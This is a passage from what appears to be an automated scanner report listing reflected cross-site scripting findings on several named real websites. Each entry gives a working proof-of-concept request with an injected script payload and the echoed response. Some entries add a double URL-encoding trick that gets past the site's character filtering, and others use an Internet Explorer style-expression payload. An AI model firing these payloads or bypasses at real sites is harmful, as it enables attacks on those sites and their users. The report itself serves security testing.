Host:   http://www.kminek.pl
Path:   /lab/yetii/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28728<script>alert(1)</script>812ffa424ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lab/yetii28728<script>alert(1)</script>812ffa424ab/ HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:02:24 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=spgj6939rjejseveijoefseot5; path=/
Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:02:23 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:02:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8323

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/lab/yetii28728<script>alert(1)</script>812ffa424ab/</strong>
...[SNIP]...

3.121. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e81"><script>alert(1)</script>49b2497dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:02:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:02:05 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJd2b1SLSA0e1Ag==; expires=Fri, 03-Feb-12 22:02:05 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s3; path=/
Content-Length: 94075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a href="/wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc">
...[SNIP]...

3.122. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c002"><script>alert(1)</script>7f0bb6aab4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:52 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJdB3+EjrA6g2Ag==; expires=Fri, 03-Feb-12 22:01:52 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s2; path=/
Cache-control: private
Content-Length: 154339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a class="sub-menu-icon" href="/wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1#nogo" rel="nofollow" title="">
...[SNIP]...

3.123. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82d7d'%3balert(1)//5681bfb5b3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82d7d';alert(1)//5681bfb5b3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wholesale-Shower-Faucets_c2863?82d7d'%3balert(1)//5681bfb5b3e=1 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:54 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJdKdmyLWA0jaAg==; expires=Fri, 03-Feb-12 22:01:54 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s3; path=/
Cache-control: private
Content-Length: 155234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a class="nowrap tab_USD" href="http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863?82d7d';alert(1)//5681bfb5b3e=1&amp;currency=USD" rel="nofollow" title="US Dollar" target="_top">
...[SNIP]...

3.124. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e5e2<a>074b39b533a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-aasG6JkxVvmNA8e5e2<a>074b39b533a HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Thu, 03 Feb 2011 22:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> p-aasG6JkxVvmNA8e5e2<a>074b39b533a</em>
...[SNIP]...

3.125. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aabbe"><a>fe7c65bf24b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-aasG6JkxVvmNAaabbe"><a>fe7c65bf24b HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Thu, 03 Feb 2011 22:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" p-aasG6JkxVvmNAaabbe"><a>fe7c65bf24b" />
...[SNIP]...

3.126. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3 was submitted in the REST URL parameter 1. This input was echoed as 1d612"style="x:expression(alert(1))"0eedd2683a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:59 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0rroqt55mx5ciq55y2wqysn5; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/1d612"style="x:expression(alert(1))"0eedd2683a3/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

3.127. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e was submitted in the REST URL parameter 1. This input was echoed as f0935"style="x:expression(alert(1))"182a262986e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buyf0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:55 GMT
Content-Length: 8732
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u5pklnekx3dx2wzgqqztpun5; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buyf0935"style="x:expression(alert(1))"182a262986e/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.128. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 was submitted in the REST URL parameter 2. This input was echoed as 4fed4"style="x:expression(alert(1))"152282d3cc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buy/4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:10 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=nmr5smvrazti5abqjnbbtv45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/4fed4"style="x:expression(alert(1))"152282d3cc2/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.129. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 was submitted in the REST URL parameter 2. This input was echoed as c1baf"style="x:expression(alert(1))"056ce7adff3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buy/x22c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:05 GMT
Content-Length: 8732
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dvui0v455qaojrfdct104guc; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22c1baf"style="x:expression(alert(1))"056ce7adff3/" rel="nofollow" target="_blank">
...[SNIP]...

3.130. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61661"style%3d"x%3aexpression(alert(1))"aa36938865b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61661"style="x:expression(alert(1))"aa36938865b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /buy/x22?61661"style%3d"x%3aexpression(alert(1))"aa36938865b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zuev0255yk14t1frw24v3j55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22/?61661"style="x:expression(alert(1))"aa36938865b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.131. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b9c"style="x:expression(alert(1))"07d1f7b8086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /buy/x22?47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sbcbwyb2aq3qzfu15i0dsh55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22/?47b9c"style="x:expression(alert(1))"07d1f7b8086=1" rel="nofollow" target="_blank">
...[SNIP]...

3.132. http://www.smartdraw.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03 was submitted in the REST URL parameter 1. This input was echoed as 2a862"><script>alert(1)</script>8fd8df6ce03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03?id=340839/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dc5mez55nymwryfaavsylt55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8844
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/2a862"><script>alert(1)</script>8fd8df6ce03/?id=340839/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidde
...[SNIP]...

3.133. http://www.smartdraw.com/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c was submitted in the REST URL parameter 1. This input was echoed as 96d2c"><script>alert(1)</script>26549339e2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c?id=340839/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: ASP.NET_SessionId=q4uupajw15d2f4bqiizdyum2; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8907
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
